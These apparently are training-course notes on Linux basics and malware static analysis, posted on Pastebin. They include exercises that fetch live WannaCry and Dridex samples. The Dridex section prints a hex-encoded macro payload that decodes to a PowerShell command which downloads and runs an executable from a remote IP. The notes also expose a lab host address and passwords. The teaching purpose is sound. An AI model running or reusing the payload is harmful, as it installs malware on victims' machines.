Advertisement
joemccray

PMRF Linux Basics

Jul 9th, 2019
1,730
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #####################################################
  2. # PMRF Intro to Linux & Comptia Linux+ Exam Prep #
  3. # By Joe McCray aegisweaponssystem #
  4. #####################################################
  5.  
  6. - Here is a good set of slides for getting started with Linux:
  7. http://www.slideshare.net/olafusimichael/linux-training-24086319
  8.  
  9.  
  10. - Here is a good tutorial that you should complete before doing the labs below:
  11. http://linuxsurvival.com/linux-tutorial-introduction/
  12.  
  13.  
  14. - I prefer to use Putty to SSH into my Linux host.
  15. - You can download Putty from here:
  16. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  17.  
  18. Here is the information to put into putty
  19.  
  20. Host Name: 45.32.217.27
  21. protocol: ssh
  22. port: 22
  23. username: pmrf
  24. password:
  25.  
  26.  
  27. ########################
  28. # Basic Linux Commands #
  29. ########################
  30.  
  31. ---------------------------Type This-----------------------------------
  32. cd ~
  33.  
  34. pwd
  35.  
  36. whereis pwd
  37.  
  38. which pwd
  39.  
  40. sudo find / -name pwd
  41.  
  42. /bin/pwd
  43.  
  44. mkdir yourname <---- replace 'yourname' with your first name in lowercase with no spaces or special characters please
  45.  
  46. cd yourname <---- replace 'yourname' with your first name in lowercase with no spaces or special characters please
  47.  
  48. touch one two three
  49.  
  50. ls -l t (without pressing the Enter key, press the Tab key twice. What happens?)
  51.  
  52. h (and again without pressing the Enter key, press the Tab key twice. What happens?)
  53.  
  54. Press the 'Up arrow key' (What happens?)
  55.  
  56. Press 'Ctrl-A' (What happens?)
  57.  
  58. ls
  59.  
  60. clear (What happens?)
  61.  
  62. echo one > one
  63.  
  64. cat one (What happens?)
  65.  
  66. man cat (What happens?)
  67. q
  68.  
  69. cat two
  70.  
  71. cat one > two
  72.  
  73. cat two
  74.  
  75. cat one two > three
  76.  
  77. cat three
  78.  
  79. echo four >> three
  80.  
  81. cat three (What happens?)
  82.  
  83. wc -l three
  84.  
  85. man wc
  86. q
  87.  
  88. info wc
  89. q
  90.  
  91. cat three | grep four
  92.  
  93. cat three | grep one
  94.  
  95. man grep
  96. q
  97.  
  98.  
  99. man ps
  100. q
  101.  
  102. ps
  103.  
  104. ps aux
  105.  
  106. ps aux | less
  107.  
  108. Press the 'Up arrow key' (What happens?)
  109.  
  110. Press the 'Down arrow key' (What happens?)
  111. q
  112.  
  113. top
  114. q
  115. -----------------------------------------------------------------------
  116.  
  117.  
  118. #########
  119. # Files #
  120. #########
  121. ---------------------------Type This-----------------------------------
  122. cd ~
  123.  
  124. pwd
  125.  
  126. cd ~/yourname/
  127.  
  128. pwd
  129.  
  130. ls
  131.  
  132. mkdir LinuxBasics
  133.  
  134. cd LinuxBasics
  135.  
  136. pwd
  137.  
  138. ls
  139.  
  140. mkdir files
  141.  
  142. cp one files/
  143.  
  144. ls files/
  145.  
  146. cd files/
  147.  
  148. cp ../two .
  149.  
  150. ls
  151.  
  152. cp ../three .
  153.  
  154. ls
  155.  
  156. tar cvf files.tar *
  157.  
  158. ls
  159.  
  160. gzip files.tar
  161.  
  162. ls
  163.  
  164. rm -rf one two three
  165.  
  166. ls
  167.  
  168. tar -zxvf files.tar.gz
  169.  
  170. rm -rf files.tar.gz
  171.  
  172. zip data *
  173.  
  174. unzip -l data.zip
  175.  
  176. mkdir /tmp/yourname/
  177.  
  178. unzip data.zip -d /tmp/yourname/
  179. -----------------------------------------------------------------------
  180.  
  181.  
  182.  
  183. ############
  184. # VIM Demo #
  185. ############
  186. ---------------------------Type This-----------------------------------
  187. cd ~/yourname/LinuxBasics
  188.  
  189. mkdir vimlesson
  190.  
  191. cd vimlesson
  192.  
  193. vi lesson1.sh
  194.  
  195. i (press "i" to get into INSERT mode and then paste in the lines below)
  196.  
  197. #!/bin/bash
  198.  
  199. echo "This is my first time using vi to create a shell script"
  200. echo " "
  201. echo " "
  202. echo " "
  203. sleep 5
  204. echo "Ok, now let's clear the screen"
  205. sleep 3
  206. clear
  207.  
  208.  
  209. ---------------don't put this line in your script----------------------------
  210.  
  211. ESC (press the ESC key to get you out of INSERT mode)
  212.  
  213. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  214.  
  215.  
  216. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  217.  
  218.  
  219.  
  220. vi lesson1.sh
  221.  
  222. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  223.  
  224. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  225.  
  226. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  227.  
  228.  
  229.  
  230.  
  231. vi lesson1.sh
  232.  
  233. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  234.  
  235. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  236.  
  237.  
  238. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  239.  
  240. /echo (typing "/echo" immediately after SHIFT: will search the file for the word echo).
  241.  
  242. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  243.  
  244. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  245.  
  246.  
  247.  
  248.  
  249. vi lesson1.sh
  250.  
  251. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  252.  
  253. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  254.  
  255.  
  256. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  257.  
  258. 4 (typing "4" immediately after SHIFT: will take you to line number 4).
  259.  
  260. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  261.  
  262. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  263.  
  264.  
  265.  
  266.  
  267. vi lesson1.sh
  268.  
  269. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  270.  
  271. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  272.  
  273.  
  274. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  275.  
  276. 4 (typing "4" immediately after SHIFT: will take you to line number 4).
  277.  
  278. dd (typing "dd" will delete the line that you are on)
  279.  
  280. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  281.  
  282. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  283.  
  284.  
  285.  
  286.  
  287. vi lesson1.sh
  288.  
  289. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  290.  
  291. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  292.  
  293.  
  294. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  295.  
  296. 4 (typing "4" immediately after SHIFT: will take you to line number 4).
  297.  
  298. dd (typing "dd" will delete the line that you are on)
  299.  
  300. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  301.  
  302. syntax on (typing "syntax on" immediately after SHIFT: will turn on syntax highlighting
  303.  
  304. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  305.  
  306. set tabstop=5 (typing "set tabstop=5" immediately after SHIFT: will set your tabs to 5 spaces
  307.  
  308. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  309.  
  310. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  311.  
  312.  
  313.  
  314.  
  315. vi .vimrc
  316. i (press "i" to get into INSERT mode and then paste in the lines below)
  317.  
  318.  
  319. set number
  320. syntax on
  321. set tabstop=5
  322.  
  323. ESC (press the ESC key to get you out of INSERT mode)
  324.  
  325. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  326.  
  327. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  328.  
  329.  
  330.  
  331.  
  332.  
  333.  
  334. vi lesson1.sh
  335.  
  336. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  337.  
  338. echo $MYVIMRC (typing "echo $MYVIMRC" immediately after SHIFT: will display the path to your new .vimrc file
  339.  
  340. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  341.  
  342. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  343. -----------------------------------------------------------------------
  344.  
  345.  
  346.  
  347.  
  348.  
  349.  
  350.  
  351.  
  352. ###############
  353. # Permissions #
  354. ###############
  355. ---------------------------Type This-----------------------------------
  356. cd ~/yourname/LinuxBasics
  357.  
  358. ls -l one
  359. -----------------------------------------------------------------------
  360. We can determine a lot from examining the results of this command. The file "one" is owned by user "me".
  361. Now "me" has the right to read and write this file.
  362. The file is owned by the group "me". Members of the group "me" can also read and write this file.
  363. Everybody else can read this file
  364.  
  365.  
  366. ---------------------------Type This-----------------------------------
  367. ls -l /bin/bash
  368. -----------------------------------------------------------------------
  369.  
  370. Here we can see:
  371.  
  372. The file "/bin/bash" is owned by user "root". The superuser has the right to read, write, and execute this file.
  373. The file is owned by the group "root". Members of the group "root" can also read and execute this file. Everybody else can read and execute this file
  374.  
  375.  
  376. The next command you need to know is "chmod"
  377. rwx rwx rwx = 111 111 111
  378. rw- rw- rw- = 110 110 110
  379. rwx --- --- = 111 000 000
  380.  
  381. and so on...
  382.  
  383. rwx = 111 in binary = 7
  384. rw- = 110 in binary = 6
  385. r-x = 101 in binary = 5
  386. r-- = 100 in binary = 4
  387.  
  388.  
  389. ---------------------------Type This-----------------------------------
  390. ls -l one
  391.  
  392. chmod 600 one
  393.  
  394. ls -l one
  395.  
  396. sudo useradd yourname
  397. aegisweaponssystem
  398.  
  399.  
  400. sudo passwd yourname
  401.  
  402. P@$$w0rd321
  403. P@$$w0rd321
  404.  
  405. sudo chown testuser one
  406. aegisweaponssystem
  407.  
  408. ls -l one
  409.  
  410. sudo chgrp testuser one
  411. aegisweaponssystem
  412.  
  413. ls -l one
  414.  
  415. id
  416.  
  417. su testuser
  418. P@$$w0rd321
  419. -----------------------------------------------------------------------
  420.  
  421. Here is a table of numbers that covers all the common settings. The ones beginning with "7" are used with programs (since they enable execution) and the rest are for other kinds of files.
  422.  
  423. Value Meaning
  424. 777 (rwxrwxrwx) No restrictions on permissions. Anybody may do anything. Generally not a desirable setting.
  425.  
  426. 755 (rwxr-xr-x) The file's owner may read, write, and execute the file. All others may read and execute the file. This setting is common for programs that are used by all users.
  427.  
  428. 700 (rwx------) The file's owner may read, write, and execute the file. Nobody else has any rights. This setting is useful for programs that only the owner may use and must be kept private from others.
  429.  
  430. 666 (rw-rw-rw-) All users may read and write the file.
  431.  
  432. 644 (rw-r--r--) The owner may read and write a file, while all others may only read the file. A common setting for data files that everybody may read, but only the owner may change.
  433.  
  434. 600 (rw-------) The owner may read and write a file. All others have no rights. A common setting for data files that the owner wants to keep private.
  435.  
  436.  
  437.  
  438. Directory permissions
  439. ---------------------
  440. The chmod command can also be used to control the access permissions for directories. In most ways, the permissions scheme for directories works the same way as they do with files. However, the execution permission is used in a different way. It provides control for access to file listing and other things. Here are some useful settings for directories:
  441.  
  442. Value Meaning
  443. 777 (rwxrwxrwx) No restrictions on permissions.
  444. Anybody may list files, create new files in the directory and delete files in the directory.
  445. Generally not a good setting.
  446.  
  447.  
  448.  
  449. 755 (rwxr-xr-x) The directory owner has full access.
  450. All others may list the directory, but cannot create files nor delete them.
  451. This setting is common for directories that you wish to share with other users.
  452.  
  453.  
  454.  
  455. 700 (rwx------) The directory owner has full access. Nobody else has any rights. This setting is useful for directories that only the owner may use and must be kept private from others.
  456.  
  457. ######################
  458. # Process Management #
  459. ######################
  460. ---------------------------Type This-----------------------------------
  461. top
  462. q
  463.  
  464. htop
  465. q
  466.  
  467. ps
  468.  
  469. ps aux
  470.  
  471. ps -A
  472.  
  473. ps -A | less
  474.  
  475. ps axjf
  476.  
  477. pstree
  478.  
  479. pstree -A
  480.  
  481. pgrep bash
  482.  
  483. pgrep init
  484.  
  485. ps aux | grep apache
  486. -----------------------------------------------------------------------
  487.  
  488.  
  489.  
  490. You can list all of the signals that are possible to send with kill by typing:
  491. ---------------------------Type This-----------------------------------
  492. kill -l
  493.  
  494. sudo kill -HUP pid_of_apache
  495.  
  496. The pkill command works in almost exactly the same way as kill, but it operates on a process name instead:
  497.  
  498. pkill -9 ping
  499. The above command is the equivalent of:
  500.  
  501. kill -9 `pgrep ping`
  502. -----------------------------------------------------------------------
  503.  
  504.  
  505.  
  506.  
  507. ################
  508. # Hashing Demo #
  509. ################
  510. ---------------------------Type This-----------------------------------
  511. cd ~/yourname/LinuxBasics
  512.  
  513. mkdir hashdemo
  514.  
  515. cd hashdemo
  516.  
  517. echo test > test.txt
  518.  
  519. cat test.txt
  520.  
  521. md5sum test.txt
  522.  
  523. echo hello >> test.txt
  524.  
  525. cat test.txt
  526.  
  527. md5sum test.txt
  528.  
  529. echo test2 > test2.txt
  530.  
  531. cat test2.txt
  532.  
  533. sha256sum test2.txt
  534.  
  535. echo hello >> test2.txt
  536.  
  537. cat test2.txt
  538.  
  539. sha256sum test2.txt
  540.  
  541. cd ..
  542. -----------------------------------------------------------------------
  543.  
  544.  
  545.  
  546. #################################
  547. # Symmetric Key Encryption Demo #
  548. #################################
  549. ---------------------------Type This-----------------------------------
  550. cd ~/yourname/LinuxBasics
  551.  
  552. mkdir gpgdemo
  553.  
  554. cd gpgdemo
  555.  
  556. echo test > test.txt
  557.  
  558. cat test.txt
  559.  
  560. gpg -c test.txt
  561. password
  562. password
  563.  
  564. ls | grep test
  565.  
  566. cat test.txt
  567.  
  568. cat test.txt.gpg
  569.  
  570. rm -rf test.txt
  571.  
  572. ls | grep test
  573.  
  574. gpg -o output.txt test.txt.gpg
  575. password
  576.  
  577. cat output.txt
  578. -----------------------------------------------------------------------
  579.  
  580.  
  581.  
  582. #########################################################################################################################
  583. # Asymmetric Key Encryption Demo #
  584. # #
  585. # Configure random number generator #
  586. # https://www.howtoforge.com/helping-the-random-number-generator-to-gain-enough-entropy-with-rng-tools-debian-lenny #
  587. #########################################################################################################################
  588. ---------------------------Type This-----------------------------------
  589. cd ~/yourname/LinuxBasics/gpgdemo
  590.  
  591. echo hello > file1.txt
  592.  
  593. echo goodbye > file2.txt
  594.  
  595. echo green > file3.txt
  596.  
  597. echo blue > file4.txt
  598.  
  599. tar czf files.tar.gz *.txt
  600.  
  601. gpg --gen-key
  602. 1
  603. 1024
  604. 0
  605. y
  606. John Doe
  607. john@doe.com
  608. --blank comment--
  609. O
  610. password
  611. password
  612.  
  613.  
  614.  
  615. gpg --armor --output file-enc-pubkey.txt --export 'John Doe'
  616.  
  617. cat file-enc-pubkey.txt
  618.  
  619. gpg --armor --output file-enc-privkey.asc --export-secret-keys 'John Doe'
  620.  
  621. cat file-enc-privkey.asc
  622.  
  623. gpg --encrypt --recipient 'John Doe' files.tar.gz
  624.  
  625. rm -rf files.tar.gz *.txt
  626.  
  627. ls
  628.  
  629. tar -zxvf files.tar.gz.gpg
  630.  
  631. gpg --output output.tar.gz --decrypt files.tar.gz.gpg
  632. password
  633.  
  634. tar -zxvf output.tar.gz
  635.  
  636. ls
  637. -----------------------------------------------------------------------
  638.  
  639.  
  640.  
  641. ##############################################
  642. # Log Analysis with Linux command-line tools #
  643. ##############################################
  644. - The following command line executables are found in the Mac as well as most Linux Distributions.
  645.  
  646. cat – prints the content of a file in the terminal window
  647. grep – searches and filters based on patterns
  648. awk – can sort each row into fields and display only what is needed
  649. sed – performs find and replace functions
  650. sort – arranges output in an order
  651. uniq – compares adjacent lines and can report, filter or provide a count of duplicates
  652.  
  653.  
  654.  
  655.  
  656.  
  657. ##############
  658. # Cisco Logs #
  659. ##############
  660. ---------------------------Type This-----------------------------------
  661. wget https://s3.amazonaws.com/infosecaddictsfiles/cisco.log
  662. -----------------------------------------------------------------------
  663.  
  664.  
  665. AWK Basics
  666. ----------
  667. - To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
  668. ---------------------------Type This-----------------------------------
  669. cat cisco.log | awk '{print $5}' | tail -n 4
  670. -----------------------------------------------------------------------
  671.  
  672.  
  673.  
  674. - Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
  675. ---------------------------Type This-----------------------------------
  676. cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
  677. -----------------------------------------------------------------------
  678.  
  679.  
  680.  
  681. - While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
  682. ---------------------------Type This-----------------------------------
  683. cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
  684. -----------------------------------------------------------------------
  685.  
  686.  
  687.  
  688.  
  689. - Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
  690. ---------------------------Type This-----------------------------------
  691. cat cisco.log | grep %LINEPROTO-5-UPDOWN:
  692.  
  693. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
  694.  
  695. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
  696.  
  697. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
  698. -----------------------------------------------------------------------
  699.  
  700.  
  701. ################
  702. # The Scenario #
  703. ################
  704. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
  705.  
  706.  
  707. The fastest thing you can do is perform static analysis.
  708.  
  709.  
  710.  
  711. ###################
  712. # Static Analysis #
  713. ###################
  714.  
  715. - After logging please open a terminal window and type the following commands:
  716. ---------------------------Type This-----------------------------------
  717. cd Desktop/
  718. -----------------------------------------------------------------------
  719.  
  720. - This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
  721.  
  722. ---------------------------Type This-----------------------------------
  723. cd ~/Desktop/
  724. wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip --no-check-certificate
  725. wget https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py --no-check-certificate
  726.  
  727. unzip malware-password-is-infected.zip
  728. infected
  729.  
  730. file malware.exe
  731.  
  732. mv malware.exe malware.pdf
  733.  
  734. file malware.pdf
  735.  
  736. mv malware.pdf malware.exe
  737.  
  738. hexdump -n 2 -C malware.exe
  739. -----------------------------------------------------------------------
  740.  
  741.  
  742. ***What is '4d 5a' or 'MZ'***
  743. Reference:
  744. http://www.garykessler.net/library/file_sigs.html
  745.  
  746. ---------------------------Type This-----------------------------------
  747. objdump -x malware.exe
  748.  
  749. strings malware.exe
  750.  
  751. strings --all malware.exe | head -n 6
  752.  
  753. strings malware.exe | grep -i dll
  754.  
  755. strings malware.exe | grep -i library
  756.  
  757. strings malware.exe | grep -i reg
  758.  
  759. strings malware.exe | grep -i hkey
  760.  
  761. strings malware.exe | grep -i hku
  762. -----------------------------------------------------------------------
  763. - We didn't see anything like HKLM, HKCU or other registry type stuff
  764.  
  765.  
  766. ---------------------------Type This-----------------------------------
  767. strings malware.exe | grep -i irc
  768.  
  769. strings malware.exe | grep -i join
  770.  
  771. strings malware.exe | grep -i admin
  772.  
  773. strings malware.exe | grep -i list
  774. -----------------------------------------------------------------------
  775.  
  776. - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
  777.  
  778. ---------------------------Type This-----------------------------------
  779. sudo apt-get install -y python-pefile
  780. malware
  781.  
  782. vi analyse_malware.py
  783.  
  784. python analyse_malware.py malware.exe
  785. -----------------------------------------------------------------------
  786.  
  787.  
  788.  
  789.  
  790. ################################
  791. # Good references for WannaCry #
  792. ################################
  793.  
  794. References:
  795.  
  796. https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
  797. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  798. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  799.  
  800.  
  801.  
  802. - After logging please open a terminal window and type the following commands:
  803. ---------------------------Type This-----------------------------------
  804. cd Desktop/
  805.  
  806. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
  807.  
  808. unzip wannacry.zip
  809. infected
  810.  
  811. file wannacry.exe
  812.  
  813. mv wannacry.exe malware.pdf
  814.  
  815. file malware.pdf
  816.  
  817. mv malware.pdf wannacry.exe
  818.  
  819. hexdump -n 2 -C wannacry.exe
  820. -----------------------------------------------------------------------
  821.  
  822.  
  823.  
  824. ***What is '4d 5a' or 'MZ'***
  825. Reference:
  826. http://www.garykessler.net/library/file_sigs.html
  827.  
  828.  
  829.  
  830.  
  831. ---------------------------Type This-----------------------------------
  832. objdump -x wannacry.exe
  833.  
  834. strings wannacry.exe
  835.  
  836. strings --all wannacry.exe | head -n 6
  837.  
  838. strings wannacry.exe | grep -i dll
  839.  
  840. strings wannacry.exe | grep -i library
  841.  
  842. strings wannacry.exe | grep -i reg
  843.  
  844. strings wannacry.exe | grep -i key
  845.  
  846. strings wannacry.exe | grep -i rsa
  847.  
  848. strings wannacry.exe | grep -i open
  849.  
  850. strings wannacry.exe | grep -i get
  851.  
  852. strings wannacry.exe | grep -i mutex
  853.  
  854. strings wannacry.exe | grep -i irc
  855.  
  856. strings wannacry.exe | grep -i join
  857.  
  858. strings wannacry.exe | grep -i admin
  859.  
  860. strings wannacry.exe | grep -i list
  861. -----------------------------------------------------------------------
  862.  
  863.  
  864.  
  865.  
  866.  
  867.  
  868.  
  869.  
  870.  
  871.  
  872. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  873.  
  874. Quick Google search for "wannacry ransomeware analysis"
  875.  
  876.  
  877. Reference
  878. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  879.  
  880. - Yara Rule -
  881.  
  882.  
  883. Strings:
  884. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  885. $s2 = “Wanna Decryptor” wide ascii nocase
  886. $s3 = “.wcry” wide ascii nocase
  887. $s4 = “WANNACRY” wide ascii nocase
  888. $s5 = “WANACRY!” wide ascii nocase
  889. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  890.  
  891.  
  892.  
  893.  
  894.  
  895.  
  896.  
  897.  
  898. Ok, let's look for the individual strings
  899.  
  900.  
  901. ---------------------------Type This-----------------------------------
  902. strings wannacry.exe | grep -i ooops
  903.  
  904. strings wannacry.exe | grep -i wanna
  905.  
  906. strings wannacry.exe | grep -i wcry
  907.  
  908. strings wannacry.exe | grep -i wannacry
  909.  
  910. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  911. -----------------------------------------------------------------------
  912.  
  913.  
  914.  
  915.  
  916.  
  917.  
  918. ####################################
  919. # Tired of GREP - let's try Python #
  920. ####################################
  921. Decided to make my own script for this kind of stuff in the future. I
  922.  
  923. Reference1:
  924. https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
  925.  
  926. This is a really good script for the basics of static analysis
  927.  
  928. Reference:
  929. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  930.  
  931.  
  932. This is really good for showing some good signatures to add to the Python script
  933.  
  934.  
  935. Here is my own script using the signatures (started this yesterday, but still needs work):
  936. https://pastebin.com/guxzCBmP
  937.  
  938.  
  939.  
  940. ---------------------------Type This-----------------------------------
  941. sudo apt install -y python-pefile
  942. infosecaddicts
  943.  
  944.  
  945.  
  946. wget https://pastebin.com/raw/guxzCBmP
  947.  
  948.  
  949. mv guxzCBmP am.py
  950.  
  951.  
  952. vi am.py
  953.  
  954. python am.py wannacry.exe
  955. -----------------------------------------------------------------------
  956.  
  957.  
  958.  
  959.  
  960.  
  961.  
  962.  
  963. Building a Malware Scanner
  964. --------------------------
  965.  
  966. ---------------------------Type This-----------------------------------
  967. mkdir ~/Desktop/malwarescanner
  968.  
  969. cd ~/Desktop/malwarescanner
  970.  
  971. wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
  972.  
  973. unzip master.zip
  974.  
  975. cd malwarescanner-master/
  976.  
  977. python scanner.py -h
  978.  
  979. cat strings.txt
  980.  
  981. cat hashes.txt
  982.  
  983. mkdir ~/Desktop/malcode
  984.  
  985. cp ~/Desktop/malware.exe ~/Desktop/malcode
  986.  
  987. python scanner.py -H hashes.txt -D ~/Desktop/malcode/ strings.txt
  988.  
  989. cd ~/Desktop/
  990. -----------------------------------------------------------------------
  991.  
  992.  
  993. #####################################################
  994. # Analyzing Macro Embedded Malware #
  995. # Reference: #
  996. # https://jon.glass/analyzes-dridex-malware-p1/ #
  997. #####################################################
  998. ---------------------------Type This-----------------------------------
  999. cd ~/Desktop/
  1000.  
  1001.  
  1002. sudo pip install olefile
  1003.  
  1004.  
  1005. mkdir ~/Desktop/oledump
  1006.  
  1007. cd ~/Desktop/oledump
  1008.  
  1009. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  1010.  
  1011. unzip oledump_V0_0_22.zip
  1012.  
  1013. wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
  1014.  
  1015. unzip 064016.zip
  1016. infected
  1017.  
  1018. python oledump.py 064016.doc
  1019.  
  1020. python oledump.py 064016.doc -s A4 -v
  1021. -----------------------------------------------------------------------
  1022.  
  1023.  
  1024.  
  1025. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  1026. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  1027.  
  1028. ---------------------------Type This-----------------------------------
  1029. python oledump.py 064016.doc -s A5 -v
  1030. -----------------------------------------------------------------------
  1031.  
  1032. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  1033.  
  1034. ---------------------------Type This-----------------------------------
  1035. python oledump.py 064016.doc -s A3 -v
  1036.  
  1037. - Look for "GVhkjbjv" and you should see:
  1038.  
  1039. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  1040.  
  1041. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  1042. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  1043.  
  1044.  
  1045.  
  1046.  
  1047. ##############
  1048. # Yara Ninja #
  1049. ##############
  1050. ---------------------------Type This-----------------------------------
  1051. sudo apt-get remove -y yara
  1052.  
  1053.  
  1054. wget https://github.com/plusvic/yara/archive/v3.4.0.zip
  1055.  
  1056. sudo apt-get -y install libtool
  1057.  
  1058.  
  1059. unzip v3.4.0.zip
  1060.  
  1061. cd yara-3.4.0
  1062.  
  1063. ./bootstrap.sh
  1064.  
  1065. ./configure
  1066.  
  1067. make
  1068.  
  1069. sudo make install
  1070.  
  1071.  
  1072. yara -v
  1073.  
  1074. cd ..
  1075.  
  1076. wget https://github.com/Yara-Rules/rules/archive/master.zip
  1077.  
  1078. unzip master.zip
  1079.  
  1080. cd ~/Desktop
  1081.  
  1082. yara rules-master/packer.yar malcode/malware.exe
  1083. -----------------------------------------------------------------------
  1084.  
  1085. Places to get more Yara rules:
  1086. ------------------------------
  1087. https://malwareconfig.com/static/yaraRules/
  1088. https://github.com/kevthehermit/YaraRules
  1089. https://github.com/VectraThreatLab/reyara
  1090.  
  1091.  
  1092.  
  1093. Yara rule sorting script:
  1094. -------------------------
  1095. https://github.com/mkayoh/yarasorter
  1096.  
  1097.  
  1098. ---------------------------Type This-----------------------------------
  1099. cd ~/Desktop/rules-master
  1100. for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
  1101. cd ~/Desktop/
  1102. yara rules-master/master.yar malcode/malware.exe
  1103. -----------------------------------------------------------------------
  1104.  
  1105.  
  1106.  
  1107.  
  1108.  
  1109.  
  1110.  
  1111.  
  1112.  
  1113. Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
  1114. http://derekmorton.name/files/malware_12-14-12.sql.bz2
  1115.  
  1116.  
  1117. Malware Repositories:
  1118. http://malshare.com/index.php
  1119. http://www.malwareblacklist.com/
  1120. http://www.virusign.com/
  1121. http://virusshare.com/
  1122. http://www.tekdefense.com/downloads/malware-samples/
  1123.  
  1124.  
  1125.  
  1126.  
  1127. ###############################
  1128. # Creating a Malware Database #
  1129. ###############################
  1130.  
  1131. Creating a malware database (sqlite)
  1132. ---------------------------Type This-----------------------------------
  1133. sudo apt-get install -y python-simplejson python-simplejson-dbg
  1134.  
  1135.  
